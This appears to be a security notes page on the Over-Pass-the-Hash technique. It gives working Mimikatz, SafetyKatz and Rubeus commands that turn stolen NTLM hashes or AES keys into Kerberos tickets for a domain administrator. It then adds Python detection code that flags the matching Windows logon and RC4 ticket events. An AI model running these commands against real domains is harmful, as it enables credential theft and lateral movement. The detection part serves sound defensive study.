Over-PassTheHash

Over Pass the Hash (OPTH) is a technique for authenticating to a system with a password hash or key instead of the actual password. It can be carried out with tools such as Mimikatz, SafetyKatz, or Rubeus. The commands below show how to use these tools to generate tokens from hashes or keys and start a new session.

Difference between PTH and O-PTH:

  • O-PTH is used to access services on domain-joined machines.

  • Pass-the-Hash (PTH) replays the credentials of local users, such as local administrators.

```powershell
# Needs elevated privileges
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256:<aes256key> /run:powershell.exe"'

SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256:<aes256key> /run:cmd.exe" "exit"

# The commands below don't need elevation
Rubeus.exe asktgt /user:administrator /rc4:<ntlmhash> /ptt

Rubeus.exe asktgt /user:administrator /aes256:<aes256key> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```
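On the detection side, the commands above tend to leave two traces in the Windows Security log: a logon type 9 event (4624) created through the `seclogo` logon process when a process is started with network-only credentials, and a TGT request (4768) using RC4 when `/rc4` is supplied. The following is an added example, not part of the original page; the event records are constructed, the host and account names are placeholders, and the RC4 rule assumes a domain where AES is the normal Kerberos encryption type.

```python
# Added example (not from the original page). Field names follow the Windows
# Security event schema; every record in SAMPLE_EVENTS is constructed.
RC4_HMAC = 0x17  # Kerberos etype 23: the key is the NT hash (the /rc4 case)

def classify(event):
    """Return a finding label for one event record, or None if unremarkable."""
    eid = event.get("EventID")
    if eid == 4624:
        # sekurlsa::pth /run and /createnetonly start a process holding
        # network-only credentials: logon type 9 through the seclogo process.
        logon_proc = event.get("LogonProcessName", "").strip().lower()
        if str(event.get("LogonType")) == "9" and logon_proc == "seclogo":
            return "netonly-logon"
    elif eid == 4768:
        # TGT request (AS-REQ); the etype is a hex string as in the event XML.
        etype = int(str(event.get("TicketEncryptionType", "0x0")), 16)
        if etype == RC4_HMAC:
            return "rc4-tgt-request"
    return None

def triage(events):
    """Return (computer, account, finding) for each flagged event, in order."""
    hits = []
    for ev in events:
        finding = classify(ev)
        if finding:
            hits.append((ev.get("Computer"), ev.get("TargetUserName"), finding))
    return hits

SAMPLE_EVENTS = [  # constructed records; host names are placeholders
    {"EventID": 4768, "Computer": "dc01", "TargetUserName": "alice",
     "TicketEncryptionType": "0x12"},                       # AES256: normal
    {"EventID": 4768, "Computer": "dc01", "TargetUserName": "administrator",
     "TicketEncryptionType": "0x17"},                       # RC4: flagged
    {"EventID": 4624, "Computer": "ws07", "TargetUserName": "bob",
     "LogonType": 2, "LogonProcessName": "User32 "},        # interactive logon
    {"EventID": 4624, "Computer": "ws07", "TargetUserName": "bob",
     "LogonType": "9", "LogonProcessName": "seclogo"},      # netonly: flagged
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

Legitimate `runas /netonly` use produces the same 4624 pattern, so treat hits as leads to correlate with process creation and Kerberos activity from the same host rather than as verdicts.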
